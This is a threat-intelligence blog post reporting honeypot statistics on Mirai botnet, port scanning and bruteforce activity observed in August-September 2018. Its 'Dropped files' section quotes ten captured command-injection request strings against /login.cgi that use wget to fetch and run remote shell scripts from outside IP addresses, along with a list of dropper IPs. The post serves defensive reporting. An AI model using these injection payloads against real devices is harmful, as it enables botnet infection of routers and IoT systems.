This site uses cookies to provide you with a great user experience. Accept

Monitored Detected Enriched

2018-10-11 19:53

With the purpose of making UnderAttack more and more rich of data, we are constantly monitoring attackers to detect events occurring Today.

With our powerful engine we are also enriching and tagging live all this detected data, to be later analyzed by us.

Soon our portal will be available for you to search on our system and gather all this information.

Here we are reporting some of the information you can find on it, all data is from 2018/8/1 to 2018/9/30, enjoy!

Top tags

As said our tagging system is recognizing behaviors and techniques, adding a tag to all detected events. Notice that an event is often an aggregate of detected attempts.

These are only the top 10 aggregated tags over time, by focusing our search on a specified period of time, you can find more precise information, this will be possible on our portal.

Following is a focus on some of the tags that you can find more interesting.

Mirai Botnet events

Port scanning events

Bruteforce events

What is the origin of these events?

Top scanning countries

Top Mirai Botnet countries

Top bruteforcing countries

As previously stated, UnderAttack makes a difference from occurrences and events, an event is often an aggregate of attempts. Should be interesting to know how many unique IPs are part of these events:

Dropped files

 We detected many attempts to make our systems to download a malicious file, this is often a dropper that does download something worse. You can find analysis on these files on our portal. Here are the some information on this kind of attack.

Top dropper URI from Mirai Botnet

  • /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://46.166.185.42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.106.251/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
  • /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

Top dropper IPs from Mirai Botnet

  • 118.179.176.11
  • 64.137.239.197
  • 61.176.222.170
  • 182.92.11.66
  • 58.218.213.44
  • 61.176.222.171
  • 61.176.220.76
  • 103.73.161.112
  • 117.34.111.9
  • 162.247.97.222

What’s next?

 This was just a glimpse, more posts will follow with analysis and statistics, don’t miss them!

 Shortly we will release our portal where you can find all of this and much more. Stay tuned for the announcement ;)